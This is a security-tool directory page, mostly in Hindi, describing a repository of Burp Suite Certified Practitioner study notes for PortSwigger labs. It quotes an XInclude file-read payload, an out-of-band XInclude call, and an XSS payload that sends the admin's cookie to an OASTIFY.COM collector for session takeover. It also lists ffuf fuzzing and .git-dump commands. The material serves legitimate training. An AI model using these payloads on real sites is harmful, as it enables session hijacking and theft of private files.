Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Burp-Suite-Certified-Practitioner-Exam-Study — PortSwigger Academy लैब्स के लिए व्यावहारिक अध्ययन नोट्स और वॉकथ्रू, जिनमें वेब भेद्यताएँ, पेलोड, एन्यूमरेशन और BSCP परीक्षा रणनीतियाँ शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/botesjuan/burp-suite-certified-practitioner-exam-study
भेद्यता विश्लेषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनावेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षाचयनित संसाधनपेलोड डेवलपमेंटलर्निंग पाथ और कोर्स
लैब और अभ्यास
लर्निंग पाथ और कोर्स में शीर्ष #9
GitHubbotesjuan/burp-suite-certified-practitioner-exam-study

Burp-Suite-Certified-Practitioner-Exam-Study

PortSwigger Academy लैब्स के लिए व्यावहारिक अध्ययन नोट्स और वॉकथ्रू, जिनमें वेब भेद्यताएँ, पेलोड, एन्यूमरेशन और BSCP परीक्षा रणनीतियाँ शामिल हैं।

रिपॉजिटरी देखें
1.5k3851681 महीना पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Burp Suite Certified Practitioner परीक्षा अध्ययन

यह मेरे अध्ययन नोट्स हैं जिनमें 110 से अधिक PortSwigger Academy Labs शामिल हैं। मैंने इन लैब्स का उपयोग Burp Suite Certified Practitioner परीक्षा 2023 पास करने के लिए किया। मेरी BSCP योग्यता।
अधिक जानकारी के लिए PortSwigger Academy पर जाएं ताकि नवीनतम शिक्षण सामग्री प्राप्त हो सके।


स्कैनिंग - एन्यूमरेशन
फोकस स्कैनिंग
गैर-मानक इकाइयों को स्कैन करें

फुटहोल्ड - चरण 1
कंटेंट डिस्कवरी
DOM-XSS
XSS क्रॉस-साइट स्क्रिप्टिंग
वेब कैश पॉइज़न
होस्ट हेडर
HTTP रिक्वेस्ट स्मगलिंग
ब्रूट फोर्स
प्रमाणीकरण

विशेषाधिकार एस्केलेशन - चरण 2
CSRF - अकाउंट टेकओवर
पासवर्ड रीसेट
SQLi - SQL इंजेक्शन
JWT - JSON वेब टोकन
प्रोटोटाइप पॉल्यूशन
API परीक्षण
एक्सेस कंट्रोल
GraphQL API एंडपॉइंट
CORS - क्रॉस-ओरिजिन रिसोर्स शेयरिंग

डेटा एक्सफिल्ट्रेशन - चरण 3
XXE - XML इकाइयाँ और इंजेक्शन
SSRF - सर्वर-साइड रिक्वेस्ट फोर्जरी
SSTI - सर्वर-साइड टेम्पलेट इंजेक्शन
SSPP - सर्वर-साइड प्रोटोटाइप पॉल्यूशन
LFI - फ़ाइल पाथ ट्रैवर्सल
फ़ाइल अपलोड
डिसीरियलाइज़ेशन
OS कमांड इंजेक्शन

अनुबंध
Python स्क्रिप्ट्स
पेलोड
वर्ड लिस्ट
फोकस टार्गेट स्कैनिंग
दृष्टिकोण
अतिरिक्त प्रशिक्षण सामग्री

मेरे Burp टिप्स

मैं अनुशंसा करता हूँ कि परीक्षा से पहले अपने कौशल का परीक्षण करने और कमजोरियों की पहचान करने में लगने वाले समय को कम करने के लिए जितना संभव हो उतने Mystery lab challenge करें।
मुझे अपनी परीक्षा दोबारा देने पर PortSwigger की यह सलाह भी बहुत जानकारीपूर्ण लगी।
2024 में BSCP परीक्षा पर नया दृष्टिकोण पाने के लिए CryptoCat - Burp Suite Certified Professional (BSCP) समीक्षा + टिप्स/ट्रिक्स देखें।




Buy Me A Coffee

समर्थित कॉफ़ी के लिए धन्यवाद, \o/

मेरा Burp Suite Certified Practitioner प्रमाणपत्र।


स्कैनिंग

वेब अनुप्रयोगों की एन्यूमरेशन समय-सीमित अभियान में प्रारंभिक और निर्देशित स्कैनिंग के साथ शुरू होती है।

फोकस स्कैनिंग
गैर-मानक इकाइयों को स्कैन करें

फोकस स्कैनिंग

अभियान या परीक्षा के दौरान सख्त समय सीमा के कारण, विशिष्ट अनुरोधों के लिए परिभाषित इंसर्शन पॉइंट स्कैन करें।

scan-defined-insertion-points

स्कैनर ने storeId पैरामीटर पर XML इंजेक्शन कमजोरी का पता लगाया और इससे Carlos की गोपनीय फ़ाइल पढ़ने में मदद मिली।```xml <xi:include parse="text" href="file:///home/carlos/secret"/>

>Out of band XInclude अनुरोध, स्थानीय फ़ाइल पढ़ने के लिए होस्टेड DTD की आवश्यकता है।```xml
<hqt xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://OASTIFY.COM/foo"/></hqt>

PortSwigger Lab: लक्षित स्कैनिंग द्वारा तेज़ी से कमजोरियों की खोज

गैर-मानक डेटा संरचनाओं को स्कैन करना

प्रतिक्रियाओं या अनुरोधों में चयनित टेक्स्ट के लिए चयनित इंसर्शन पॉइंट को स्कैन करने वाली बर्प सुविधा का उपयोग करके गैर-मानक डेटा संरचनाओं को स्कैन करना।

scan-selected-insertion-point

बर्प स्कैनर के इश्यू परिणामों के माध्यम से कमजोरी की पहचान करें।
इस मामले में, पहचाने गए XSS का उपयोग करके, पहचाने गए इंसर्शन पॉइंट में पेलोड तैयार करके एडमिन उपयोगकर्ता के कुकीज़ चुराएँ।``` '"><svg/onload=fetch(//OASTIFY.COM/${encodeURIComponent(document.cookie)})>:CURRENT-USER-LOGIN-COOKIE-2ND-PART

>मुख्य वर्णों को URL एनकोड करें।  

![admin-cookie-stealer](https://assets.kitploit.com/production/public/readmes/51008/64ba64b0fa7e1681859eb5d76a88f94fb91a78655f1ce768ff8e1b50f3cf57c1/990ac058ff6a9727193848c821acf60a43011fa7ba8dfd967ab6b3dd7f2e0bcb-display-v1.webp)  

>व्यवस्थापक पैनल तक पहुँचने के लिए व्यवस्थापक उपयोगकर्ता की कुकी को वर्तमान ब्राउज़र सत्र में बदलकर उपयोग करें।  

[PortSwigger लैब: गैर-मानक डेटा संरचनाओं की स्कैनिंग](https://portswigger.net/web-security/essential-skills/using-burp-scanner-during-manual-testing/lab-scanning-non-standard-data-structures)  
    
-----

# फ़ुटहोल्ड  
  
# सामग्री खोज  

>लक्ष्य का सूचीकरण वेब निर्देशिकाओं और फ़ाइलों के फ़ज़िंग से शुरू होता है। छिपे हुए पथ और फ़ाइलों को खोजने के लिए या तो Burp engagement tools, content discovery विकल्प का उपयोग करें या वेब निर्देशिकाओं और फ़ाइलों को सूचीबद्ध करने के लिए `FFUF` का उपयोग करें। `robots.txt` या `sitemap.xml` को देखने से सामग्री का पता चल सकता है।```bash
wget https://raw.githubusercontent.com/botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study/main/wordlists/burp-labs-wordlist.txt

ffuf -c -w ./burp-labs-wordlist.txt -u https://TARGET.web-security-academy.net/FUZZ

Burp एंगेजमेंट टूल, मेरी संकलित शब्द सूची burp-labs-wordlist को कस्टम फ़ाइल सूची के रूप में उपयोग करके सामग्री खोज।

content-discovery.png

स्थानीय डाउनलोड की गई प्रति पर git रिपॉजिटरी की ब्रांचों की जाँच करें, git-cola टूल का उपयोग करके। फिर अंतिम कमिट पूर्ववत करें चुनें और डिफ़ विंडो से एडमिन पासवर्ड निकालें।``` wget -r https://TARGET.web-security-academy.net/.git/

टूल डाउनलोड करें